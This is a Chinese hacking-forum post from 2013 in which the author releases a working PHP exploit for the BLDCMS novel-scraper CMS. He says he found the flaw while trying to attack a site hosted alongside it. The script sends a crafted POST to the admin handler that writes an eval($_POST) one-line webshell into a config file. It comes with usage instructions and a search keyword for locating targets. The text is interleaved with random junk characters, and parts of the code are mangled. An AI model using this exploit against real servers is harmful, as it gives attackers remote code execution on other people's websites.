之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞# F9 n. W4 D8 R' k3 Q8 D
3 P" e x+ K) r2 y# t
1 _7 n( o2 B. {5 R+ N3 z4 A话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 5 n8 n1 T5 V# ?" c
4 e3 r) D, f, w! f. y0 [
既然都有人发了 我就把我之前写好的EXP放出来吧9 _ s% \; N0 [& x5 J1 B6 [
6 L6 R/ g- X' ~. L
view source print?01.php;">1 S( d; t. p$ |6 t
02.<!--?php; b: _% s, l/ d6 A
03.echo "-------------------------------------------------------------------
! C1 S- Q/ y; N. V7 {04. ) ~6 A7 [# d/ Q6 ^( Q7 J4 x# ^. Z L
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP2 m q, M8 w& |# ~8 o; T* N; n% x
06.
! Y3 ^ w7 D' e1 N- b" j* `07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun8 }& E8 F3 X2 a1 X
08. 8 D' M+ X5 e. h! B8 B
09.QQ:981009941\r\n 2013.3.21\r\n 0 o$ P3 N8 h3 p( N2 F% m* i
10.
# @( U" n- Z6 E: i% p0 o2 Z+ S11. 4 [' x/ ^3 |, G+ Q
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码( s# P+ H. h: ?; F- }
13.
( y+ \' g9 Z& Y14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------2 r8 V. N p2 M4 m7 }" m
15. 0 \: f# R; T& ?6 d: a5 |$ e% _
16.--------------------------------------------------------------------\r\n";$ O j$ `5 q% N: z
17.$url=$argv[1];
& e# \3 J5 L& c G ^& _: {$ X18.$dir=$argv[2];( [# }! r3 N; c5 ~, D
19.$pass=$argv[3];
+ f! Z) y" `3 Z20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
( i5 u9 ?4 `7 x. y& u21.if (emptyempty($pass)||emptyempty($url))
7 o' C5 `0 L& p! R9 ^2 R8 M; Y22.{exit("请输入参数");}
9 z3 h; Z2 l5 b. p4 ?5 H1 f2 v23.else2 V/ |# u Q- l/ a$ F8 H
24.{! F7 T) C! E" `9 O S
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
i. S" D4 l6 ]0 e26.
/ T0 J( s! D6 e9 w: r! N27.al;
( u. p# @; m" V! m2 Q, j28.$length = strlen($fuckdata);
! C" y& n* n7 W) l4 B29.function getshell($url,$pass)- Y! C' y( g1 T% M
30.{
4 W* f, Q1 y- Q& q31.global $url,$dir,$pass,$eval,$length,$fuckdata;1 \- L7 Y4 t0 l
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";$ a5 k R% Z( r" E/ d4 m' G1 k1 l; g2 K
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
5 y8 D( C6 d" V0 p/ ^3 l N34.$header .= "User-Agent: MSIE\r\n";
5 D# N$ O) N% v' R U4 x35.$header .= "Host:".$url."\r\n";
- O' o6 @( W. d2 M3 ~) }36.$header .= "Content-Length: ".$length."\r\n";3 ^& m) x. G! @ A; M
37.$header .= "Connection: Close\r\n";" k( J" o' W9 s& K" l: ~! `& Q: F
38.$header .="\r\n";6 a# O; Z) b2 n* x4 D
39.$header .= $fuckdata."\r\n\r\n";. A3 h! {' n6 y0 |+ L% z+ q1 S3 H& F
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
9 N6 t2 d# m m2 B9 t41.if (!$fp)
* Q' {: P; {" {/ g+ u- _% g5 F* \42.{
" _* Z& z! F. i& t# g43.exit ("利用失败:请检查指定目标是否能正常打开");; p' B' w6 V) R7 o% I) B) V8 P) @
44.}8 y" S/ B/ A5 q# V+ j2 o, @
45.else{ if (!fputs($fp,$header))
" o& K* q" }+ i46.{exit ("利用失败");}- l* R/ L' v! a6 v
47.else
# t" ~, d6 ^* d- V6 r8 M" p. f48.{
4 X# Z5 ]% ^5 h. S+ q! m1 v% w49.$receive = '';) o: {8 e& }- F3 |5 H, c
50.while (!feof($fp)) {
9 [! p3 O: P$ f9 v0 N* `51.$receive .= @fgets($fp, 1000);
( R3 h# _3 s! w# L/ m6 e52.}
/ m; @) \* s; J; Z! K& a7 w4 ~; A( X& ?53.@fclose($fp);) v& l0 _3 I$ Q) h+ s- }8 ^/ D. l
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
. T; D E* V+ E/ p55. $ ?' j% \- [8 r) h6 F5 W8 K/ d& Q
56.GPC是否=off)";6 Q( I4 ^8 e. z4 {2 {
57.}}
- V6 C+ h. f& |) k8 m; M58.}
M8 } k" l7 g4 s9 F6 V# X$ ?9 e59.}
5 q0 i/ P( W) o" a/ ^; x8 Q60.getshell($url,$pass);
' i% {5 r% }8 \( a4 ^61.?-->
) S1 h% F" g! g . v! J% E$ C, c6 r1 Q
- U) h3 e. l" Z6 H
_4 U: K; @" T7 f9 g: tby 数据流* `- G! d6 S& z* m
|
发表于 2013-3-26 20:49:10
收藏
支持
反对